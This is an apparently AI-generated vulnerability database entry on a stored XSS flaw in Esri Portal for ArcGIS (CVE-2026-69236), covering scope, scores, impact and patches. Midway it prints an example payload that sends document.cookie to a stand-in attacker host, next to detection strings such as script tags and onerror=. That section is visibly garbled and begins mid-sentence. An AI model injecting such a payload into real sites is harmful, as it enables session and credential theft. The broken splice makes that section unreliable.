
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-69236 is a stored cross-site scripting (XSS) vulnerability in Esri Portal for ArcGIS that may allow a remote attacker to inject malicious code and execute arbitrary JavaScript in a victim's browser. It affects Portal for ArcGIS versions 11.1 through 12.1 (inclusive), running on both Windows and Linux platforms. The vulnerability was published on August 21, 2026, by Esri (Environmental Systems Research Institute, Inc.) as part of their August 2026 ArcGIS Security Bulletin. It carries a CVSS v3.1 base score of 6.1 (Medium) (GitHub Advisory, Feedly).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) XSS variant. An attacker with network access can inject malicious script content into Portal for ArcGIS that is subsequently stored and rendered to other users' browsers without proper sanitization or output encoding. Exploitation requires user interaction (a victim must view the affected content), but no authentication is required on the attacker's side to submit the malicious payload. No public proof-of-concept or detailed technical write-up has been identified at this time (GitHub Advisory, Feedly).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who view the affected portal content, enabling session hijacking, credential theft, phishing, or malware distribution. Because the injected script executes in the context of the victim's authenticated session, attackers could potentially access sensitive geospatial data, impersonate users, or perform unauthorized actions within the ArcGIS Enterprise environment. Availability is not directly impacted, but confidentiality and integrity are both affected at a low level per the CVSS assessment (Feedly, GitHub Advisory).
There is no known public proof-of-concept exploit and no evidence of active in-the-wild exploitation as of the time of publication. The vulnerability has not been added to the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.177% (8th percentile), indicating a low near-term probability of exploitation (GitHub Advisory, Feedly).
<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable input field that persists in the portal.<script>, javascript:, onerror=, or other XSS-indicative strings in item metadata or description fields; repeated access to specific portal items by multiple users followed by anomalous external connections.Esri recommends that all users of ArcGIS Enterprise versions 11.1, 11.3, 11.5, 12.0, and 12.1 apply the available patch immediately, and that all users upgrade to the latest long-term support release. The patch details and download instructions are provided in the August 2026 ArcGIS Security Bulletin. As interim mitigations, administrators should consider implementing Content Security Policy (CSP) headers and enforcing strict input validation and output encoding within the portal environment (Esri Security Bulletin, Feedly).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."